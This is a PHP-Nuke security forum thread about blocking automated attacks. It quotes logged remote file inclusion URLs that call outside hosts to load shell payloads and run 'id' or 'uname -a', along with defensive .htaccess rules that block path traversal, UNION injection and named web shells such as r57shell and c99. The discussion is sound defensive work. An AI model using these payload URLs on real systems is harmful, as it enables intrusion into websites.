Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 6792
Location: Ha Noi, Viet Nam

PostPosted: Tue Feb 21, 2006 3:55 am Reply with quote

Perhaps some have seen my statement "Probably the most secure version of nuke ever" on my site over at Only registered users can see links on this board! Get registered or login! and thought I was issuing a challenge.
The following attempts have been tried (for modules which do not exist Laughing )
Code:
modules/Forums/admin/admin_styles.php?phpbb_root_path=http://saudia.100free.com/asc.txt?&cmd=uname%20-a;id

Code:
/modules/4nAlbum/public/displayCategory.php?basepath=http://www.lilspage.de/modules/tool25.dat?cmd=id

Quote:
www.code-authors.com/index.php?cat=http://www.lilspage.de/modules/tool25.dat?cmd=id
Get String: Only registered users can see links on this board! Get registered or login!

Quote:
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.lilspage.de/modules/tool25.dat?cmd=id

Quote:
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.clan-ff.net/vwar/tool25.dat?&cmd=id


These are quite obviously some sort of automated attack and needless to say they didnt work but what would be the best way to block such attacks?
 
View user's profile Send private message Send e-mail
djmaze
Subject Matter Expert


Joined: May 15, 2004
Posts: 719
Location: http://tinyurl.com/5z8dmv

PostPosted: Tue Feb 21, 2006 7:21 am Reply with quote

Code:


RewriteCond %{QUERY_STRING} =http://  [NC]
RewriteRule ^.*$ - [F]
 
View user's profile Send private message Visit poster's website
Guardian2003
PostPosted: Tue Feb 21, 2006 7:39 am Reply with quote

Interesting - thanks for that I'll try it and see what develops.
 
djmaze
PostPosted: Tue Feb 21, 2006 8:06 am Reply with quote

here's even a better version that also denies ../../ as seen in rush attacks
for example an exploit in file=../../.htaccess
and another for UNION

RewriteCond %{QUERY_STRING} =../ [NC, OR]
RewriteCond %{QUERY_STRING} "%20UNION" [NC, OR]
RewriteCond %{QUERY_STRING} =http:// [NC]
RewriteRule ^.*$ - [F]

NOTE: this is will NOT make you 100% safe since phpnuke uses register_globals so an attack can also be made thru POST and COOKIE
 
Guardian2003
PostPosted: Tue Feb 21, 2006 8:59 am Reply with quote

Thanks!!
 
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Tue Feb 21, 2006 9:08 am Reply with quote

admin_styles.php is a known attack that has hit phpBB systems (and those using phpBB derivates) several times.

Ditto 4nAlbum and My_eGallery using the same displayCategory.php

The attack on index.php is nothing I have seen. Must have been a "cat" variable vulnerable somewhere.

Does Sentinel not block these attacks?

---

For my site not using Sentinel, here's what I have right now.
Using DisError to capture the 404 messages and read the 'REDIRECT_URL'
If it includes anything on 'xmlrpc.php' 'awstats.pl' 'displayCategory.php' 'upgrade_album.php'
They get a banned

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Guardian2003
PostPosted: Tue Feb 21, 2006 9:52 am Reply with quote

evaders - with the exception of the third quote (above) none tripped Sentinel but that is probably due to my sloppy blocker configuration which I'm looking at right now.
 
spasticdonkey
RavenNuke(tm) Development Team


Joined: Dec 02, 2006
Posts: 1692
Location: Texas, USA

PostPosted: Wed Feb 18, 2009 12:57 am Reply with quote

djmaze wrote:
here's even a better version that also denies ../../ as seen in rush attacks
for example an exploit in file=../../.htaccess
and another for UNION

RewriteCond %{QUERY_STRING} =../ [NC, OR]
RewriteCond %{QUERY_STRING} "%20UNION" [NC, OR]
RewriteCond %{QUERY_STRING} =http:// [NC]
RewriteRule ^.*$ - [F]

NOTE: this is will NOT make you 100% safe since phpnuke uses register_globals so an attack can also be made thru POST and COOKIE


I know this has come up several times here and there, but alot of the posts are years old... I wondered if there was some up-to-date recommendations for additional security via htaccess..? I've used these for some time, and my sentinel emails decreased dramatically after adding.. Smile
Code:
RewriteCond %{HTTP_USER_AGENT} ^libwww [NC,OR]  

RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond % _CONF [OR]
RewriteCond % tool25 [OR]
RewriteCond % cmd.txt [OR]
RewriteCond % r57shell [OR]
RewriteCond % c99 [OR]
RewriteCond % THEME_DIR [OR]
RewriteRule ^.* - [F,L]

RewriteCond %{QUERY_STRING} .*http:\/\/.*
Rewriterule ^.* - [F]


I believe I was told the http one would break some admin functions such as verify downloads and weblinks, but never tried... but it will also stop alot of cross site scripting attacks...

just thought i would toss it out there, food for thought.
 
View user's profile Send private message Visit poster's website
evaders99
PostPosted: Wed Feb 18, 2009 1:09 am Reply with quote

phpNuke does pass http through some functions, mostly redirects. But otherwise, it is good to use
 
slackervaara
Worker
Worker


Joined: Aug 26, 2007
Posts: 236

PostPosted: Wed Feb 18, 2009 9:57 pm Reply with quote

I also use this line:

RewriteCond %{THE_REQUEST} .*http%3A%2F%2F.* [OR]
 
View user's profile Send private message
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©